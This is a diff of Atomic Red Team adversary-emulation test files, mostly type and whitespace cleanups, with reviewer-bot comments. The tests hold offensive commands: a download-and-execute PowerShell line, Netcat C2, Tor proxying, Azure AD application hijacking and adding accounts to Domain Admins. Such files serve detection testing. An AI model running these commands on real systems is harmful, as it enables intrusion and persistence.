@@ -189,7 +189,7 @@ atomic_tests: name: powershell - name: WinPwn - Powersploits privesc checks auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7 - description: Powersploits privesc checks using oldchecks function of WinPwn + description: Powersploits privesc checks using oldchecks function of WinPwn supported_platforms: - windows executor: @@ -206,7 +206,7 @@ atomic_tests: name: powershell - name: WinPwn - General privesc checks auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed - description: General privesc checks using the otherchecks function of WinPwn + description: General privesc checks using the otherchecks function of WinPwn supported_platforms: - windows executor: @@ -249,7 +249,7 @@ atomic_tests: RBCD-Check -consoleoutput -noninteractive name: powershell -- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches +- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107 description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn supported_platforms: @@ -269,12 +269,12 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" name: powershell - -- name: WinPwn - PowerSharpPack - Seatbelt + +- name: WinPwn - PowerSharpPack - Seatbelt auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 description: |- PowerSharpPack - Seatbelt technique via function of WinPwn. - + [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. supported_platforms: - windows 
@@ -294,11 +294,11 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az dependency_executor_name: powershell dependencies: @@ -369,4 +369,3 @@ atomic_tests: wmic OS get Caption,OSArchitecture,Version wmic DISKDRIVE get Caption name: command_prompt - diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index 25958c4c..b36f4540 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -9,9 +9,9 @@ atomic_tests: - windows input_arguments: output_file: - description: File to output results to - type: String - default: '%temp%\T1083Test1.txt' + description: File to output results to + type: string + default: '%temp%\T1083Test1.txt' executor: command: | dir /s c:\ >> #{output_file} @@ -52,7 +52,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1083.txt executor: command: | @@ -77,7 +77,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1083.txt executor: command: | @@ -99,7 +99,7 @@ atomic_tests: input_arguments: File_to_output: description: File to output results to - type: String + type: string default: $env:temp\T1083Test5.txt executor: command: | 
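Review bot: `username` now has a bare `default:` where it previously had an explicit `null`; a loader still reads it as null, so behaviour is unchanged, but it is the ambiguous form yamllint's `empty-values` rule flags and it reads like an accidental deletion. Keep `default: null`, or write `default: ""` if an empty string is what is meant. The sibling `password` argument in the same hunk is not affected.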
@@ -116,19 +116,19 @@ atomic_tests: cat #{File_to_output} cleanup_command: | remove-item #{File_to_output} -ErrorAction SilentlyContinue - name: powershell + name: powershell - name: Launch DirLister Executable auto_generated_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7 description: |- Launches the DirLister executable for a short period of time and then exits. - + Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files. supported_platforms: - windows input_arguments: dirlister_path: description: 'Path to the DirLister executable ' - type: String + type: string default: PathToAtomicsFolder\T1083\bin\DirLister.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index ef8f4fe5..4298aa8b 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -86,7 +86,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt dependency_executor_name: sh dependencies: diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index a59cd57d..33970fda 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml 
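Review bot: `dirlister_path` keeps `description: 'Path to the DirLister executable '` with a trailing space inside the quotes, presumably the only reason the value is quoted, and this whitespace-normalising change leaves it in place. Drop it, `description: Path to the DirLister executable`, so the quotes become unnecessary and generated documentation does not carry the stray space.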
@@ -34,7 +34,7 @@ atomic_tests: input_arguments: computer_name: description: Name of remote system to query - type: String + type: string default: "%COMPUTERNAME%" executor: command: | @@ -50,7 +50,7 @@ atomic_tests: input_arguments: adrecon_path: description: Path of ADRecon.ps1 file - type: Path + type: path default: $env:TEMP\ADRecon.ps1 dependency_executor_name: powershell dependencies: @@ -77,7 +77,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -101,7 +101,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -125,7 +125,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -149,7 +149,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -186,11 +186,11 @@ atomic_tests: input_arguments: domain: description: Domain FQDN - type: String + type: string default: $env:UserDnsDomain uac_prop: description: UAC Property to search - type: String + type: string default: 524288 dependencies: - description: | 
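Review bot: `uac_prop` is retyped to `string` in the last hunk of this file, but its default `524288` stays an unquoted plain scalar, which every YAML loader reads as an integer, so the declared type and the loaded value disagree. Quote it, `default: "524288"`, as the `connectport` and `listenport` defaults in T1090.001 already are elsewhere in this diff.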
@@ -282,13 +282,13 @@ atomic_tests: supported_platforms: - windows input_arguments: - Domain: + Domain: description: Domain that is being tested against - type: String + type: string default: $env:USERDOMAIN DomainController: description: Domain Controller that is being tested against - type: String + type: string default: $env:UserDnsDomain dependency_executor_name: powershell dependencies: diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml index f246d094..74eee5a6 100644 --- a/atomics/T1090.001/T1090.001.yaml +++ b/atomics/T1090.001/T1090.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: proxy_server: description: Proxy server URL (host:port) - type: Url + type: url default: 127.0.0.1:8080 proxy_scheme: description: Protocol to proxy (http or https) - type: String + type: string default: http executor: command: | @@ -31,22 +31,22 @@ atomic_tests: description: | Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. - + Note that this test may conflict with pre-existing system configuration. supported_platforms: - - macos + - macos input_arguments: proxy_server: description: Proxy server URL (host) - type: Url + type: url default: 127.0.0.1 proxy_port: description: Proxy server port - type: Integer + type: integer default: 8080 interface: description: Protocol to proxy (http or https) - type: String + type: string default: Wi-Fi executor: name: sh 
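Review bot: In the macOS proxy test the `interface` argument's description, `Protocol to proxy (http or https)`, is copied from `proxy_scheme` in the test above it, while its default `Wi-Fi` indicates a network service name; the retype in this hunk keeps the wrong text. Suggest `description: Name of the network interface whose proxy settings are modified (as listed under System Preferences => Network)`.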
@@ -67,15 +67,15 @@ atomic_tests: input_arguments: connectaddress: description: Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. - type: String + type: string default: 127.0.0.1 connectport: description: Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. - type: String + type: string default: "1337" listenport: description: Specifies the IPv4 port, by port number or service name, on which to listen. - type: String + type: string default: "1337" executor: command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 9953ea53..57b7c5fe 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml 
@@ -11,29 +11,29 @@ atomic_tests: http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html supported_platforms: - - windows - dependency_executor_name: powershell + - windows + dependency_executor_name: powershell dependencies: - - description: | - The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt - prereq_command: | - if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1} - get_prereq_command: | - if(-not (test-path $env:Temp\proxy-backup.txt)){ - $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer - Set-Content $env:Temp\proxy-backup.txt $Proxy} - - description: | - The Psiphon executable must exist in the Downloads folder - prereq_command: | - if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" - - description: | - Batch file containing commands to run must be in src directory - prereq_command: | - if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" + - description: | + The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt + prereq_command: | + if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1} + get_prereq_command: | + if(-not (test-path $env:Temp\proxy-backup.txt)){ + $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer + Set-Content $env:Temp\proxy-backup.txt $Proxy} + - description: | + The Psiphon executable must exist in the Downloads folder + prereq_command: | + if 
(Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" + - description: | + Batch file containing commands to run must be in src directory + prereq_command: | + if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" executor: name: powershell command: | @@ -52,8 +52,8 @@ atomic_tests: - windows input_arguments: TorExe: - description: Location of tor.exe file. - type: String + description: Location of tor.exe file. + type: string default: $env:temp\tor\Tor\tor.exe dependency_executor_name: powershell dependencies: @@ -66,9 +66,9 @@ atomic_tests: expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor" executor: command: | - invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' - sleep -s 60 - stop-process -name "tor" | out-null + invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' + sleep -s 60 + stop-process -name "tor" | out-null name: powershell elevation_required: false - name: Tor Proxy Usage - Debian/Ubuntu 
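Review bot: The re-indented `get_prereq_command` for the Psiphon dependency still fetches `psiphon3.exe` from a third-party S3 bucket with `Invoke-WebRequest` and stores it with no integrity check, so whatever the bucket serves at run time is what the test later executes (presumably via `Psiphon.bat`; the executor body is outside this hunk). Pin the expected digest and fail the prerequisite when it does not match, e.g. after the download: `if ((Get-FileHash "$env:UserProfile\Downloads\psiphon3.exe" -Algorithm SHA256).Hash -ne "<EXPECTED_SHA256>") { Remove-Item "$env:UserProfile\Downloads\psiphon3.exe"; exit 1 }`, with the placeholder replaced by the digest the maintainers verified. The `vbscript` dependency in T1082 earlier in this diff downloads in the same unchecked way, though from the project's own repository.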
@@ -81,16 +81,16 @@ atomic_tests: dependency_executor_name: sh dependencies: - description: | - Tor must be installed on the machine + Tor must be installed on the machine prereq_command: | - if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi get_prereq_command: | - sudo apt-get -y install tor + sudo apt-get -y install tor executor: command: | - sudo systemctl start tor + sudo systemctl start tor cleanup_command: | - sudo systemctl stop tor + sudo systemctl stop tor name: sh - name: Tor Proxy Usage - MacOS auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da @@ -102,15 +102,15 @@ atomic_tests: dependency_executor_name: sh dependencies: - description: | - Tor must be installed on the machine + Tor must be installed on the machine prereq_command: | - if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi get_prereq_command: | if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi brew install tor executor: command: | - osascript -e 'tell application "Terminal" to do script "tor"' + osascript -e 'tell application "Terminal" to do script "tor"' cleanup_command: | - killall tor > /dev/null 2>&1 - name: sh + killall tor > /dev/null 2>&1 + name: sh diff --git a/atomics/T1095/T1095.yaml b/atomics/T1095/T1095.yaml index 737cc17c..a6175bb0 100644 --- a/atomics/T1095/T1095.yaml +++ b/atomics/T1095/T1095.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: server_ip: description: The IP address of the listening server - type: String + type: string default: 127.0.0.1 executor: command: | 
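Review bot: Both Tor prerequisite checks re-indented here and in the Debian/Ubuntu hunk above use `if [ -x "$(command -v tor --version)" ]`; `command -v` takes command names, so `--version` is looked up as a second name and only contributes a non-zero exit status that the `$(...)` discards. The check works by accident; `if [ -x "$(command -v tor)" ]; then exit 0; else exit 1; fi` says what is meant. The unchanged brew line in the same dependency passes `keystroke return` to `curl` as two extra URLs, which looks like a stray AppleScript fragment and should be removed from the `install.sh` invocation.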
@@ -19,7 +19,7 @@ atomic_tests: Invoke-PowerShellIcmp -IPAddress #{server_ip} name: powershell - name: Netcat C2 - auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 description: | Start C2 Session Using Ncat To start the listener on a Linux device, type the following: @@ -29,19 +29,19 @@ atomic_tests: input_arguments: server_port: description: The port for the C2 connection - type: Integer + type: integer default: 80 ncat_exe: description: The location of ncat.exe - type: Path + type: path default: $env:TEMP\T1095\nmap-7.80\ncat.exe ncat_path: description: The folder path of ncat.exe - type: Path + type: path default: $env:TEMP\T1095 server_ip: description: The IP address or domain name of the listening server - type: String + type: string default: 127.0.0.1 dependency_executor_name: powershell dependencies: @@ -74,11 +74,11 @@ atomic_tests: input_arguments: server_ip: description: The IP address or domain name of the listening server - type: String + type: string default: 127.0.0.1 server_port: description: The port for the C2 connection - type: Integer + type: integer default: 80 executor: command: | diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index 53daa131..b203d66d 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml 
@@ -12,23 +12,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the targeted service principal - type: String + type: string default: SuperSP certificate_password: description: Password of the new certificate - type: String + type: string default: Passw0rd path_to_cert: - description: Path of the new certificate, locally stored - type: String + description: Path of the new certificate, locally stored + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: @@ -83,7 +83,7 @@ atomic_tests: } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore - + name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -97,23 +97,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd application_name: - description: Name of the targeted application - type: String + description: Name of the targeted application + type: string default: SuperApp certificate_password: description: Password of the new certificate - type: String + type: string default: Passw0rd path_to_cert: - description: Path of the new certificate, locally stored - type: String + description: Path of the new certificate, locally stored + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: 
@@ -178,15 +178,15 @@ atomic_tests: input_arguments: username: description: Create new AWS access and secret keys for the user - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if the user exists. - prereq_command: | - aws iam list-users | grep #{username} - get_prereq_command: | - echo Please run atomic test T1136.003, before running this atomic + - description: | + Check if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 768d8118..cfcac453 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -41,7 +41,7 @@ atomic_tests: auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 description: | Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). - + The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
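Review bot: The re-indented `prereq_command` `aws iam list-users | grep #{username}` is a substring match over the whole JSON listing, so the prerequisite passes when any user name or ARN merely contains the value (`atomicredteam` matches `atomicredteam2`) and the executor then operates on an account that does not exist; the same line appears in the T1098 hunk that follows. Querying the user directly is exact and quieter: `aws iam get-user --user-name "#{username}" > /dev/null 2>&1`, which exits non-zero when the user is absent.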
@@ -59,15 +59,15 @@ atomic_tests: description: | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. - type: String + type: string default: atr- group: description: Name of the group to alter - type: String + type: string default: "Domain Admins" create_args: - description: Additional string appended to New-ADUser call - type: String + description: Additional string appended to New-ADUser call + type: string default: "" dependencies: - description: | @@ -110,15 +110,15 @@ atomic_tests: input_arguments: username: description: Name of the AWS group to create - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if the user exists, we can only add a user to a group if the user exists. - prereq_command: | - aws iam list-users | grep #{username} - get_prereq_command: | - echo Please run atomic test T1136.003, before running this atomic test + - description: | + Check if the user exists, we can only add a user to a group if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic test executor: command: | aws iam create-group --group-name #{username} @@ -135,7 +135,7 @@ atomic_tests: may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!). By default, the role Global Reader is assigned to service principal in this test. - + The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type. 
@@ -144,20 +144,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd user_principal_name: description: Name of the targeted user (user principal) - type: String + type: string default: SuperUser role_name: description: Name of the targed Azure AD role - type: String - default: Global Reader + type: string + default: Global Reader dependencies: - description: | AzureAD module must be installed. @@ -188,7 +188,7 @@ atomic_tests: if ($user -eq $null) { Write-Warning "User not found"; exit } $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} if ($role -eq $null) { Write-Warning "Role not found"; exit } - + Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role" name: powershell @@ -201,7 +201,7 @@ atomic_tests: may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!). By default, the role Global Reader is assigned to service principal in this test. - + The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type. 
@@ -210,20 +210,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the service principal - type: String + type: string default: SuperSP role_name: description: Name of the targed Azure AD role - type: String - default: Global Reader + type: string + default: Global Reader dependencies: - description: | AzureAD module must be installed. @@ -268,7 +268,7 @@ atomic_tests: By default, the role Reader is assigned to user in this test. New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - + The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All and Microsoft Graph Directory.Read.All permissions. @@ -279,23 +279,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd user_principal_name: description: Name of the targeted user (user principal) - type: String + type: string default: SuperUser role_name: description: Name of the targed Azure role - type: String + type: string default: Reader subscription: description: Name of the targed subscription - type: String + type: string default: Azure subscription 1 dependencies: - description: | 
@@ -346,7 +346,7 @@ atomic_tests: By default, the role Reader is assigned to service principal in this test. New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - + The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All and Microsoft Graph Directory.Read.All permissions. @@ -357,24 +357,24 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the service principal - type: String + type: string default: SuperSP role_name: description: Name of the targed Azure role - type: String - default: Reader + type: string + default: Reader subscription: description: Name of the targed subscription - type: String - default: Azure subscription 1 + type: string + default: Azure subscription 1 dependencies: - description: | Az.Resources module must be installed. @@ -410,7 +410,7 @@ atomic_tests: if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} if ($role -eq $null) { Write-Warning "Role not found"; exit } - + Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)" name: powershell 
@@ -436,19 +436,19 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd application_name: description: Name of the targed application - type: String + type: string default: test_app application_permission: description: Permission from Microsoft Graph Resource API that will be add to application - type: String + type: string default: DirectoryRecommendations.Read.All dependencies: - description: | @@ -512,7 +512,7 @@ atomic_tests: $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} Remove-AzureADApplication -ObjectId $aadApplication.ObjectId - + name: powershell elevation_required: false - name: Password Change on Directory Service Restore Mode (DSRM) Account @@ -521,11 +521,11 @@ atomic_tests: description: | Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account supported_platforms: - - windows + - windows input_arguments: sync_account: description: Account to sync password from - type: String + type: string default: '%username%' executor: name: command_prompt diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index dbb494e7..b216f426 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive rsync - type: Path + type: path default: /tmp/victim-files remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host local_path: description: Path of folder to copy - type: Path + type: path default: /tmp/adversary-rsync/ username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | 
@@ -39,19 +39,19 @@ atomic_tests: input_arguments: remote_path: description: Path of folder to copy - type: Path + type: path default: /tmp/adversary-rsync/ remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive rsync - type: Path + type: path default: /tmp/victim-files username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -67,19 +67,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive scp - type: Path + type: path default: /tmp/victim-files/ local_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-scp remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | @@ -95,19 +95,19 @@ atomic_tests: input_arguments: remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive scp - type: Path + type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-scp username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -123,19 +123,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive sftp - type: Path + type: path default: /tmp/victim-files/ local_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-sftp remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | 
@@ -151,19 +151,19 @@ atomic_tests: input_arguments: remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive sftp - type: Path + type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-sftp username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -178,11 +178,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: Atomic-license.txt executor: command: | @@ -199,11 +199,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: Atomic-license.txt executor: command: | @@ -225,15 +225,15 @@ atomic_tests: input_arguments: bits_job_name: description: Name of the created BITS job - type: String + type: string default: qcxjb7 local_path: description: Local path to place file - type: Path + type: path default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | @@ -249,11 +249,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file - type: Path + type: path default: $env:TEMP\Atomic-license.txt executor: command: | 
@@ -270,7 +270,7 @@ atomic_tests: input_arguments: destination_path: description: Path to create remote file at. Default is local admin share. - type: String + type: string default: '\\localhost\C$' executor: command: | @@ -311,11 +311,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Location to save downloaded file - type: Path + type: path default: '%temp%\Atomic-license.txt' dependencies: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' @@ -341,31 +341,31 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost remote_port: description: Remote port to connect to - type: Integer + type: integer default: 8443 output_file: description: Path of file to save output to - type: Path + type: path default: /tmp/T1105.whois.out query: description: Query to send to remote server - type: String + type: string default: "Hello from Atomic Red Team test T1105" timeout: description: Timeout period before ending process (seconds) - type: Integer + type: integer default: 1 dependencies: - - description: | - The whois and timeout commands must be present - prereq_command: | - which whois && which timeout - get_prereq_command: | - echo "Please install timeout and the whois package" + - description: | + The whois and timeout commands must be present + prereq_command: | + which whois && which timeout + get_prereq_command: | + echo "Please install timeout and the whois package" executor: name: sh elevation_required: false 
@@ -382,11 +382,11 @@ atomic_tests: input_arguments: target_remote_file: description: File to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt output_file: description: File to write to - type: String + type: string default: LICENSE.txt executor: command: | @@ -404,7 +404,7 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost executor: name: command_prompt 
